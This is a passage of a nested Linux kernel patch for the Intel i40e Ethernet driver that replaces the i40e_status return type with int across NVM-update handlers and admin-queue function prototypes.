+-				       u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno);
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno);
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno);
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno);
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno);
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno);
+ static inline u8 i40e_nvmupd_get_module(u32 val)
+ {
+ 	return (u8)(val & I40E_NVM_MOD_PNT_MASK);
+@@ -807,12 +807,12 @@ static const char * const i40e_nvm_update_state_str[] = {
+  *
+  * Dispatches command depending on what update state is current
+  **/
+-i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+-				struct i40e_nvm_access *cmd,
+-				u8 *bytes, int *perrno)
++int i40e_nvmupd_command(struct i40e_hw *hw,
++			struct i40e_nvm_access *cmd,
++			u8 *bytes, int *perrno)
+ {
+-	i40e_status status;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status;
+ 
+ 	/* assume success */
+ 	*perrno = 0;
+@@ -923,12 +923,12 @@ i40e_status i40e_nvmupd_command(struct i40e_hw *hw,
+  * Process legitimate commands of the Init state and conditionally set next
+  * state. Reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+-					  struct i40e_nvm_access *cmd,
+-					  u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_init(struct i40e_hw *hw,
++				  struct i40e_nvm_access *cmd,
++				  u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1062,12 +1062,12 @@ static i40e_status i40e_nvmupd_state_init(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands.
+  **/
+-static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_reading(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1104,13 +1104,13 @@ static i40e_status i40e_nvmupd_state_reading(struct i40e_hw *hw,
+  * NVM ownership is already held.  Process legitimate commands and set any
+  * change in state; reject all other commands
+  **/
+-static i40e_status i40e_nvmupd_state_writing(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_state_writing(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	enum i40e_nvmupd_cmd upd_cmd;
+ 	bool retry_attempt = false;
++	int status = 0;
+ 
+ 	upd_cmd = i40e_nvmupd_validate_command(hw, cmd, perrno);
+ 
+@@ -1187,8 +1187,8 @@ retry:
+ 	 */
+ 	if (status && (hw->aq.asq_last_status == I40E_AQ_RC_EBUSY) &&
+ 	    !retry_attempt) {
+-		i40e_status old_status = status;
+ 		u32 old_asq_status = hw->aq.asq_last_status;
++		int old_status = status;
+ 		u32 gtime;
+ 
+ 		gtime = rd32(hw, I40E_GLVFGEN_TIMER);
+@@ -1370,17 +1370,17 @@ static enum i40e_nvmupd_cmd i40e_nvmupd_validate_command(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+-				       struct i40e_nvm_access *cmd,
+-				       u8 *bytes, int *perrno)
++static int i40e_nvmupd_exec_aq(struct i40e_hw *hw,
++			       struct i40e_nvm_access *cmd,
++			       u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	struct i40e_aq_desc *aq_desc;
+ 	u32 buff_size = 0;
+ 	u8 *buff = NULL;
+ 	u32 aq_desc_len;
+ 	u32 aq_data_len;
++	int status;
+ 
+ 	i40e_debug(hw, I40E_DEBUG_NVM, "NVMUPD: %s\n", __func__);
+ 	if (cmd->offset == 0xffff)
+@@ -1429,8 +1429,8 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+ 				       buff_size, &cmd_details);
+ 	if (status) {
+ 		i40e_debug(hw, I40E_DEBUG_NVM,
+-			   "i40e_nvmupd_exec_aq err %s aq_err %s\n",
+-			   i40e_stat_str(hw, status),
++			   "%s err %d aq_err %s\n",
++			   __func__, status,
+ 			   i40e_aq_str(hw, hw->aq.asq_last_status));
+ 		*perrno = i40e_aq_rc_to_posix(status, hw->aq.asq_last_status);
+ 		return status;
+@@ -1454,9 +1454,9 @@ static i40e_status i40e_nvmupd_exec_aq(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+-					     struct i40e_nvm_access *cmd,
+-					     u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
++				     struct i40e_nvm_access *cmd,
++				     u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1523,9 +1523,9 @@ static i40e_status i40e_nvmupd_get_aq_result(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+-					    struct i40e_nvm_access *cmd,
+-					    u8 *bytes, int *perrno)
++static int i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
++				    struct i40e_nvm_access *cmd,
++				    u8 *bytes, int *perrno)
+ {
+ 	u32 aq_total_len;
+ 	u32 aq_desc_len;
+@@ -1557,13 +1557,13 @@ static i40e_status i40e_nvmupd_get_aq_event(struct i40e_hw *hw,
+  *
+  * cmd structure contains identifiers and data buffer
+  **/
+-static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+-					struct i40e_nvm_access *cmd,
+-					u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_read(struct i40e_hw *hw,
++				struct i40e_nvm_access *cmd,
++				u8 *bytes, int *perrno)
+ {
+ 	struct i40e_asq_cmd_details cmd_details;
+-	i40e_status status;
+ 	u8 module, transaction;
++	int status;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1596,13 +1596,13 @@ static i40e_status i40e_nvmupd_nvm_read(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 int *perrno)
++static int i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+@@ -1636,14 +1636,14 @@ static i40e_status i40e_nvmupd_nvm_erase(struct i40e_hw *hw,
+  *
+  * module, offset, data_size and data are in cmd structure
+  **/
+-static i40e_status i40e_nvmupd_nvm_write(struct i40e_hw *hw,
+-					 struct i40e_nvm_access *cmd,
+-					 u8 *bytes, int *perrno)
++static int i40e_nvmupd_nvm_write(struct i40e_hw *hw,
++				 struct i40e_nvm_access *cmd,
++				 u8 *bytes, int *perrno)
+ {
+-	i40e_status status = 0;
+ 	struct i40e_asq_cmd_details cmd_details;
+ 	u8 module, transaction;
+ 	u8 preservation_flags;
++	int status = 0;
+ 	bool last;
+ 
+ 	transaction = i40e_nvmupd_get_transaction(cmd->config);
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_osdep.h b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+index 2f6815b2f8df8..2bd4de03dafa2 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_osdep.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_osdep.h
+@@ -56,5 +56,4 @@ do {								\
+ 			(h)->bus.func, ##__VA_ARGS__);		\
+ } while (0)
+ 
+-typedef enum i40e_status_code i40e_status;
+ #endif /* _I40E_OSDEP_H_ */
+diff --git a/drivers/net/ethernet/intel/i40e/i40e_prototype.h b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+index 9a71121420c3b..fe845987d99a5 100644
+--- a/drivers/net/ethernet/intel/i40e/i40e_prototype.h
++++ b/drivers/net/ethernet/intel/i40e/i40e_prototype.h
+@@ -16,29 +16,29 @@
+  */
+ 
+ /* adminq functions */
+-i40e_status i40e_init_adminq(struct i40e_hw *hw);
++int i40e_init_adminq(struct i40e_hw *hw);
+ void i40e_shutdown_adminq(struct i40e_hw *hw);
+ void i40e_adminq_init_ring_data(struct i40e_hw *hw);
+-i40e_status i40e_clean_arq_element(struct i40e_hw *hw,
+-					     struct i40e_arq_event_info *e,
+-					     u16 *events_pending);
+-i40e_status
++int i40e_clean_arq_element(struct i40e_hw *hw,
++			   struct i40e_arq_event_info *e,
++			   u16 *events_pending);
++int
+ i40e_asq_send_command(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 		      void *buff, /* can be NULL */ u16  buff_size,
+ 		      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_asq_send_command_v2(struct i40e_hw *hw,
+ 			 struct i40e_aq_desc *desc,
+ 			 void *buff, /* can be NULL */
+ 			 u16  buff_size,
+ 			 struct i40e_asq_cmd_details *cmd_details,
+ 			 enum i40e_admin_queue_err *aq_status);
+-i40e_status
++int
+ i40e_asq_send_command_atomic(struct i40e_hw *hw, struct i40e_aq_desc *desc,
+ 			     void *buff, /* can be NULL */ u16  buff_size,
+ 			     struct i40e_asq_cmd_details *cmd_details,
+ 			     bool is_atomic_context);
+-i40e_status
++int
+ i40e_asq_send_command_atomic_v2(struct i40e_hw *hw,
+ 				struct i40e_aq_desc *desc,
+ 				void *buff, /* can be NULL */
+@@ -53,327 +53,332 @@ void i40e_debug_aq(struct i40e_hw *hw, enum i40e_debug_mask mask,
+ 
+ void i40e_idle_aq(struct i40e_hw *hw);
+ bool i40e_check_asq_alive(struct i40e_hw *hw);
+-i40e_status i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
++int i40e_aq_queue_shutdown(struct i40e_hw *hw, bool unloading);
+ const char *i40e_aq_str(struct i40e_hw *hw, enum i40e_admin_queue_err aq_err);
+-const char *i40e_stat_str(struct i40e_hw *hw, i40e_status stat_err);
+ 
+-i40e_status i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
+-				bool pf_lut, u8 *lut, u16 lut_size);
+-i40e_status i40e_aq_get_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
+-i40e_status i40e_aq_set_rss_key(struct i40e_hw *hw,
+-				u16 seid,
+-				struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_get_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_set_rss_lut(struct i40e_hw *hw, u16 seid,
++			bool pf_lut, u8 *lut, u16 lut_size);
++int i40e_aq_get_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
++int i40e_aq_set_rss_key(struct i40e_hw *hw,
++			u16 seid,
++			struct i40e_aqc_get_set_rss_key_data *key);
+ 
+ u32 i40e_led_get(struct i40e_hw *hw);
+ void i40e_led_set(struct i40e_hw *hw, u32 mode, bool blink);
+-i40e_status i40e_led_set_phy(struct i40e_hw *hw, bool on,
+-			     u16 led_addr, u32 mode);
+-i40e_status i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
+-			     u16 *val);
+-i40e_status i40e_blink_phy_link_led(struct i40e_hw *hw,
+-				    u32 time, u32 interval);
++int i40e_led_set_phy(struct i40e_hw *hw, bool on,
++		     u16 led_addr, u32 mode);
++int i40e_led_get_phy(struct i40e_hw *hw, u16 *led_addr,
++		     u16 *val);
++int i40e_blink_phy_link_led(struct i40e_hw *hw,
++			    u32 time, u32 interval);
+ 
+ /* admin send queue commands */
+ 
+-i40e_status i40e_aq_get_firmware_version(struct i40e_hw *hw,
+-				u16 *fw_major_version, u16 *fw_minor_version,
+-				u32 *fw_build,
+-				u16 *api_major_version, u16 *api_minor_version,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_write_register(struct i40e_hw *hw,
+-					u32 reg_addr, u64 reg_val,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_debug_read_register(struct i40e_hw *hw,
++int i40e_aq_get_firmware_version(struct i40e_hw *hw,
++				 u16 *fw_major_version, u16 *fw_minor_version,
++				 u32 *fw_build,
++				 u16 *api_major_version, u16 *api_minor_version,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_write_register(struct i40e_hw *hw,
++				 u32 reg_addr, u64 reg_val,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_debug_read_register(struct i40e_hw *hw,
+ 				u32  reg_addr, u64 *reg_val,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
+-				      struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
+-			bool qualified_modules, bool report_init,
+-			struct i40e_aq_get_phy_abilities_resp *abilities,
+-			struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_phy_config(struct i40e_hw *hw,
+-				struct i40e_aq_set_phy_config *config,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
+-				  bool atomic_reset);
+-i40e_status i40e_aq_set_mac_loopback(struct i40e_hw *hw,
+-				     bool ena_lpbk,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
+-				     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_link_restart_an(struct i40e_hw *hw,
+-					bool enable_link,
+-					struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_link_info(struct i40e_hw *hw,
+-				bool enable_lse, struct i40e_link_status *link,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
+-				u64 advt_reg,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_send_driver_version(struct i40e_hw *hw,
++int i40e_aq_set_phy_debug(struct i40e_hw *hw, u8 cmd_flags,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_default_vsi(struct i40e_hw *hw, u16 vsi_id,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_phy_capabilities(struct i40e_hw *hw,
++				 bool qualified_modules, bool report_init,
++				 struct i40e_aq_get_phy_abilities_resp *abilities,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_config(struct i40e_hw *hw,
++			   struct i40e_aq_set_phy_config *config,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_set_fc(struct i40e_hw *hw, u8 *aq_failures,
++		bool atomic_reset);
++int i40e_aq_set_mac_loopback(struct i40e_hw *hw,
++			     bool ena_lpbk,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_phy_int_mask(struct i40e_hw *hw, u16 mask,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_clear_pxe_mode(struct i40e_hw *hw,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_link_restart_an(struct i40e_hw *hw,
++				bool enable_link,
++				struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_link_info(struct i40e_hw *hw,
++			  bool enable_lse, struct i40e_link_status *link,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_local_advt_reg(struct i40e_hw *hw,
++			       u64 advt_reg,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_send_driver_version(struct i40e_hw *hw,
+ 				struct i40e_driver_version *dv,
+ 				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_vsi(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
+-				u16 vsi_id, bool set_filter,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details,
+-		bool rx_only_promisc);
+-i40e_status i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw,
+-		u16 vsi_id, bool set, struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
+-							 u16 seid, bool enable,
+-							 u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
+-				u16 seid, bool enable, u16 vid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
+-				u16 seid, bool enable,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_vsi_params(struct i40e_hw *hw,
+-				struct i40e_vsi_context *vsi_ctx,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
+-				u16 downlink_seid, u8 enabled_tc,
+-				bool default_port, u16 *pveb_seid,
+-				bool enable_stats,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_veb_parameters(struct i40e_hw *hw,
+-				u16 veb_seid, u16 *switch_id, bool *floating,
+-				u16 *statistic_index, u16 *vebs_used,
+-				u16 *vebs_free,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
++int i40e_aq_add_vsi(struct i40e_hw *hw,
++		    struct i40e_vsi_context *vsi_ctx,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_broadcast(struct i40e_hw *hw,
++			      u16 vsi_id, bool set_filter,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_unicast_promiscuous(struct i40e_hw *hw, u16 vsi_id, bool set,
++					struct i40e_asq_cmd_details *cmd_details,
++					bool rx_only_promisc);
++int i40e_aq_set_vsi_multicast_promiscuous(struct i40e_hw *hw, u16 vsi_id, bool set,
++					  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_mc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_uc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable,
++				       u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_bc_promisc_on_vlan(struct i40e_hw *hw,
++				       u16 seid, bool enable, u16 vid,
++				       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_set_vsi_vlan_promisc(struct i40e_hw *hw,
++				 u16 seid, bool enable,
++				 struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_vsi_params(struct i40e_hw *hw,
++			   struct i40e_vsi_context *vsi_ctx,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_update_vsi_params(struct i40e_hw *hw,
++			      struct i40e_vsi_context *vsi_ctx,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_veb(struct i40e_hw *hw, u16 uplink_seid,
++		    u16 downlink_seid, u8 enabled_tc,
++		    bool default_port, u16 *pveb_seid,
++		    bool enable_stats,
++		    struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_veb_parameters(struct i40e_hw *hw,
++			       u16 veb_seid, u16 *switch_id, bool *floating,
++			       u16 *statistic_index, u16 *vebs_used,
++			       u16 *vebs_free,
++			       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_add_macvlan(struct i40e_hw *hw, u16 vsi_id,
+ 			struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int
+ i40e_aq_add_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 		       struct i40e_aqc_add_macvlan_element_data *mv_list,
+ 		       u16 count, struct i40e_asq_cmd_details *cmd_details,
+ 		       enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
+-			struct i40e_aqc_remove_macvlan_element_data *mv_list,
+-			u16 count, struct i40e_asq_cmd_details *cmd_details);
+-i40e_status
++int i40e_aq_remove_macvlan(struct i40e_hw *hw, u16 vsi_id,
++			   struct i40e_aqc_remove_macvlan_element_data *mv_list,
++			   u16 count, struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_remove_macvlan_v2(struct i40e_hw *hw, u16 seid,
+ 			  struct i40e_aqc_remove_macvlan_element_data *mv_list,
+ 			  u16 count, struct i40e_asq_cmd_details *cmd_details,
+ 			  enum i40e_admin_queue_err *aq_status);
+-i40e_status i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rule_id, u16 *rules_used, u16 *rules_free);
+-i40e_status i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
+-			u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
+-			struct i40e_asq_cmd_details *cmd_details,
+-			u16 *rules_used, u16 *rules_free);
++int i40e_aq_add_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			   u16 rule_type, u16 dest_vsi, u16 count, __le16 *mr_list,
++			   struct i40e_asq_cmd_details *cmd_details,
++			   u16 *rule_id, u16 *rules_used, u16 *rules_free);
++int i40e_aq_delete_mirrorrule(struct i40e_hw *hw, u16 sw_seid,
++			      u16 rule_type, u16 rule_id, u16 count, __le16 *mr_list,
++			      struct i40e_asq_cmd_details *cmd_details,
++			      u16 *rules_used, u16 *rules_free);
+ 
+-i40e_status i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
+-				u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_switch_config(struct i40e_hw *hw,
+-				struct i40e_aqc_get_switch_config_resp *buf,
+-				u16 buf_size, u16 *start_seid,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code i40e_aq_set_switch_config(struct i40e_hw *hw,
+-						u16 flags,
+-						u16 valid_flags, u8 mode,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_request_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				enum i40e_aq_resource_access_type access,
+-				u8 sdp_number, u64 *timeout,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_release_resource(struct i40e_hw *hw,
+-				enum i40e_aq_resources_ids resource,
+-				u8 sdp_number,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
+-			      u32 offset, u16 length, bool last_command,
++int i40e_aq_send_msg_to_vf(struct i40e_hw *hw, u16 vfid,
++			   u32 v_opcode, u32 v_retval, u8 *msg, u16 msglen,
++			   struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_switch_config(struct i40e_hw *hw,
++			      struct i40e_aqc_get_switch_config_resp *buf,
++			      u16 buf_size, u16 *start_seid,
+ 			      struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_discover_capabilities(struct i40e_hw *hw,
+-				void *buff, u16 buff_size, u16 *data_size,
+-				enum i40e_admin_queue_opc list_type_opc,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
+-				u32 offset, u16 length, void *data,
+-				bool last_command, u8 preservation_flags,
+-				struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_rearrange_nvm(struct i40e_hw *hw,
+-				  u8 rearrange_nvm,
++int i40e_aq_set_switch_config(struct i40e_hw *hw,
++			      u16 flags,
++			      u16 valid_flags, u8 mode,
++			      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_request_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     enum i40e_aq_resource_access_type access,
++			     u8 sdp_number, u64 *timeout,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_release_resource(struct i40e_hw *hw,
++			     enum i40e_aq_resources_ids resource,
++			     u8 sdp_number,
++			     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_read_nvm(struct i40e_hw *hw, u8 module_pointer,
++		     u32 offset, u16 length, void *data,
++		     bool last_command,
++		     struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_erase_nvm(struct i40e_hw *hw, u8 module_pointer,
++		      u32 offset, u16 length, bool last_command,
++		      struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_discover_capabilities(struct i40e_hw *hw,
++				  void *buff, u16 buff_size, u16 *data_size,
++				  enum i40e_admin_queue_opc list_type_opc,
+ 				  struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
+-				u8 mib_type, void *buff, u16 buff_size,
+-				u16 *local_len, u16 *remote_len,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_update_nvm(struct i40e_hw *hw, u8 module_pointer,
++		       u32 offset, u16 length, void *data,
++		       bool last_command, u8 preservation_flags,
++		       struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_rearrange_nvm(struct i40e_hw *hw,
++			  u8 rearrange_nvm,
++			  struct i40e_asq_cmd_details *cmd_details);
++int i40e_aq_get_lldp_mib(struct i40e_hw *hw, u8 bridge_type,
++			 u8 mib_type, void *buff, u16 buff_size,
++			 u16 *local_len, u16 *remote_len,
++			 struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_set_lldp_mib(struct i40e_hw *hw,
+ 		     u8 mib_type, void *buff, u16 buff_size,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
+-				bool enable_update,
+-				struct i40e_asq_cmd_details *cmd_details);
+-enum i40e_status_code
++int i40e_aq_cfg_lldp_mib_change_event(struct i40e_hw *hw,
++				      bool enable_update,
++				      struct i40e_asq_cmd_details *cmd_details);
++int
+ i40e_aq_restore_lldp(struct i40e_hw *hw, u8 *setting, bool restore,
+ 		     struct i40e_asq_cmd_details *cmd_details);
+-i40e_status i40e_aq_stop_lldp(struct i40e_hw *hw, bool shutdown_agent,
+-			      bool persist,
+-				struct i40e_asq_cmd_details *cmd_details);
